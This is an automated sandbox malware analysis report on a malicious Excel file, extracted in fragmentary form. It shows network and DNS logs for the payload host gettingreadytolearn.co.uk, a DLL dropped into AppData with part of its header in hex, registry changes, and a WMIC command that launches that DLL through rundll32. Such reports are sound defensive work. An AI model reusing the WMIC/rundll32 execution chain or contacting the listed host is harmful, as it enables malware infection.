May 26, 2021 08:37:45.633596897 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633613110 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633655071 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633682013 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633711100 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633728981 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633747101 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633788109 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633821964 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633843899 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633851051 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633876085 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633877993 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633882999 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633887053 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633908033 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633908987 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633924961 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633939981 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633944035 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633956909 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633960962 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.633969069 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.633981943 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634005070 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634016991 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634028912 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634041071 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634049892 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.634053946 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634071112 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634077072 CEST 49167 443 192.168.2.22 109.169.78.226

May 26, 2021 08:37:45.634083986 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634100914 CEST 443 49167 109.169.78.226 192.168.2.22

May 26, 2021 08:37:45.634119987 CEST 49167 443 192.168.2.22 109.169.78.226



May 26, 2021 08:37:44.029602051 CEST 52197 53 192.168.2.22 8.8.8.8

May 26, 2021 08:37:44.230050087 CEST 53 52197 8.8.8.8 192.168.2.22

May 26, 2021 08:37:44.811110020 CEST 53099 53 192.168.2.22 8.8.8.8

May 26, 2021 08:37:44.861131907 CEST 53 53099 8.8.8.8 192.168.2.22

UDP Packets


Code Manipulations

Statistics

Behavior

• EXCEL.EXE

• WMIC.exe

May 26, 2021 08:37:44.872011900 CEST 52838 53 192.168.2.22 8.8.8.8

May 26, 2021 08:37:44.924586058 CEST 53 52838 8.8.8.8 192.168.2.22


Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

May 26, 2021 08:37:44.029602051 CEST 192.168.2.22 8.8.8.8 0xad13 Standard query (0)

gettingreadytolearn.co.uk

A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

May 26, 2021 08:37:44.230050087 CEST

8.8.8.8 192.168.2.22 0xad13 No error (0) gettingreadytolearn.co.uk

109.169.78.226 A (IP address) IN (0x0001)

Timestamp Source IPSourcePort Dest IP

DestPort Subject Issuer

NotBefore

NotAfter

JA3 SSL ClientFingerprint JA3 SSL Client Digest

May 26, 2021 08:37:44.366106033 CEST

109.169.78.226 443 192.168.2.22 49167 CN=gettingreadytolearn.co.uk CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB

CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB

Fri Mar 19 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004

Fri Jun 18 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029

771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0

7dcce5b76c8b17472d024758970a406b

CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US

CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB

Mon May 18 02:00:00 CEST 2015

Sun May 18 01:59:59 CEST 2025

CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB

CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB

Thu Jan 01 01:00:00 CET 2004

Mon Jan 01 00:59:59 CET 2029

DNS Queries

DNS Answers

HTTPS Packets


Click to jump to process

System Behavior

File ActivitiesFile Activities


Start date: 26/05/2021

Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Wow64 process (32bit): false

Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding

Imagebase: 0x13fd40000

File size: 27641504 bytes

MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: high

File Path Access Attributes Options Completion CountSourceAddress Symbol

C:\Users\user read data or list directory | synchronize

device directory file | synchronous io non alert | open for backup ident | open reparse point

object name collision

1 7FEEA8BFD74 unknown

C:\Users\user\AppData\Local read data or list directory | synchronize




C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files

read data or list directory | synchronize








Analysis Process: EXCEL.EXE PID: 2312 Parent PID: 584Analysis Process: EXCEL.EXE PID: 2312 Parent PID: 584

General

File CreatedFile Created


C:\Users\user\AppData\Roaming read data or list directory | synchronize




C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies read data or list directory | synchronize








C:\Users\user\AppData\Local read data or list directory | synchronize




C:\Users\user\AppData\Local\Microsoft\Windows\History read data or list directory | synchronize




C:\Users\user\AppData\Roaming\25793.dll read attributes | synchronize | generic write

device sequential only | synchronous io non alert | non directory file

success or wait 1 7FEEA8BFD74 unknown

C:\Users\user\AppData\Local\Temp\3516.tmp read attributes | synchronize | generic read

device synchronous io non alert | non directory file

success or wait 1 14008EC83 GetTempFileNameW

File Path Access Attributes Options Completion CountSourceAddress Symbol

File Path Completion CountSourceAddress Symbol

C:\Users\user\AppData\Local\Temp\imgs_files\stylesheet.cs~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\tabstrip.ht~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\sheet001.ht~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\image002.pn~ success or wait 1 7FEEA859AC0 unknown



C:\Users\user\AppData\Local\Temp\imgs_files\filelist.xm~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs.rcv success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs.ht~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\3516.tmp success or wait 1 1402FB818 DeleteFileW

Old File Path New File Path Completion CountSourceAddress Symbol

C:\Users\user\AppData\Local\Temp\imgs_files\stylesheet.css C:\Users\user\AppData\Local\Temp\imgs_files\stylesheet.cs~.. success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\tabstrip.htm C:\Users\user\AppData\Local\Temp\imgs_files\tabstrip.ht~s~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\sheet001.htm C:\Users\user\AppData\Local\Temp\imgs_files\sheet001.ht~s~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\image002.png C:\Users\user\AppData\Local\Temp\imgs_files\image002.pn~s~ success or wait 1 7FEEA859AC0 unknown



C:\Users\user\AppData\Local\Temp\imgs_files\filelist.xml C:\Users\user\AppData\Local\Temp\imgs_files\filelist.xm~s~ success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\stylesheet.cs_ C:\Users\user\AppData\Local\Temp\imgs_files\stylesheet.css.. success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\tabstrip.ht_ C:\Users\user\AppData\Local\Temp\imgs_files\tabstrip.htmss success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\sheet001.ht_ C:\Users\user\AppData\Local\Temp\imgs_files\sheet001.htmss success or wait 1 7FEEA859AC0 unknown

C:\Users\user\AppData\Local\Temp\imgs_files\image003.pn_ C:\Users\user\AppData\Local\Temp\imgs_files\image003.pngss success or wait 1 7FEEA859AC0 unknown



C:\Users\user\AppData\Local\Temp\imgs_files\filelist.xm_ C:\Users\user\AppData\Local\Temp\imgs_files\filelist.xmlss success or wait 1 7FEEA859AC0 unknown

File DeletedFile Deleted

File MovedFile Moved


Registry ActivitiesRegistry Activities

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

C:\Users\user\AppData\Roaming\25793.dll unknown 2048 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d0 3a 8b 33 94 5b e5 60 94 5b e5 60 94 5b e5 60 8a 09 70 60 36 5b e5 60 21 c5 3b 60 86 5a e5 60 e9 22 04 60 32 5a e5 60 94 5b e4 60 b4 5b e5 60 b3 9d 28 60 20 5a e5 60 36 9c 2a 60 8d 5a e5 60 b3 9d 99 60 cb 5a e5 60 f2 b5 2e 60 2a 5a e5 60 46 00 e1 61 9b 5a e5 60 fb 2d 78 60 2d 5a e5 60 66 02 e5 61 bd 5a e5 60 0f b0 2f 60 11 5a e5 60 66 02 e4 61 57 5b e5 60 0f b0 2e 60 a2 5b e5

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:.3.[.`.[.`.[.`..p`6[.`!.;`.Z.`.".`2Z.`.[.`.[.`..(` Z.`6.*`.Z.`...`.Z.`...`*Z.`F..a.Z.`.-x`-Z.`f..a.Z.`../`.Z.`f..aW[.`...`.[.

success or wait 86 7FEEA8BFD74 unknown

File Path Offset Length Completion CountSourceAddress Symbol

Key Path Completion CountSourceAddress Symbol

HKEY_CURRENT_USER\Software\Microsoft\VBA success or wait 1 7FEEA86E72B RegCreateKeyExA

HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0 success or wait 1 7FEEA86E72B RegCreateKeyExA

HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common success or wait 1 7FEEA86E72B RegCreateKeyExA

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Options success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\F3746 success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\F39B6 success or wait 1 7FEEA859AC0 unknown

Key Path Name Type Data Completion CountSourceAddress Symbol

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

ah8 binary 61 68 38 00 08 09 00 00 02 00 00 00 00 00 00 00 52 00 00 00 01 00 00 00 1E 00 00 00 28 00 00 00 61 00 73 00 36 00 78 00 78 00 67 00 7A 00 6E 00 66 00 6A 00 2E 00 78 00 6C 00 73 00 00 00 62 00 69 00 66 00 69 00 64 00 6C 00 79 00 20 00 62 00 69 00 6C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 73 00 00 00

success or wait 1 7FEEA859AC0 unknown

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU

Max Display dword 25 success or wait 1 7FEEA859AC0 unknown

File WrittenFile Written

Key CreatedKey Created

Key Value CreatedKey Value Created


HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru



Item 1 unicode [F00000000][T01D1BB6D4B429860][O00000000]*C:\Users\user\Desktop\3771420242.xlsx





























































HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\F3746

F3746 binary 04 00 00 00 08 09 00 00 2A 00 00 00 43 00 3A 00 5C 00 55 00 73 00 65 00 72 00 73 00 5C 00 41 00 6C 00 62 00 75 00 73 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 00 00 00 00 22 00 00 00 43 00 3A 00 5C 00 55 00 73 00 65 00 72 00 73 00 5C 00 41 00 6C 00 62 00 75 00 73 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 01 00 00 00 01 00 00 00 5E 9B 62 1E 45 52 D7 01 46 37 0F 00 46 37 0F 00 00 00 00 00 B8 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00


HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU















HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\F39B6

F39B6 binary 04 00 00 00 08 09 00 00 2A 00 00 00 43 00 3A 00 5C 00 55 00 73 00 65 00 72 00 73 00 5C 00 41 00 6C 00 62 00 75 00 73 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 00 00 00 00 22 00 00 00 43 00 3A 00 5C 00 55 00 73 00 65 00 72 00 73 00 5C 00 41 00 6C 00 62 00 75 00 73 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 01 00 00 00 01 00 00 00 5E 9B 62 1E 45 52 D7 01 B6 39 0F 00 B6 39 0F 00 00 00 00 00 B8 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00



Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol


Start date: 26/05/2021

Path: C:\Windows\System32\wbem\WMIC.exe

Analysis Process: WMIC.exe PID: 2344 Parent PID: 2312Analysis Process: WMIC.exe PID: 2344 Parent PID: 2312

General


Disassembly

Code Analysis

File ActivitiesFile Activities

Wow64 process (32bit): false

Commandline: 'C:\Windows\System32\wbem\WMIC.exe' process call create 'rundll32.exe 'C:\Users\user\AppData\Roaming\25793.dll' CscNetApiGetInterface'

Imagebase: 0xffa70000

File size: 566272 bytes

MD5 hash: FD902835DEAEF4091799287736F3A028

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: moderate

File Path Offset Length Completion CountSourceAddress Symbol


Automated Malware Analysis Report for as6xxgzNFj.xls - Generated ...

Documents

Transcript of Automated Malware Analysis Report for as6xxgzNFj.xls - Generated ...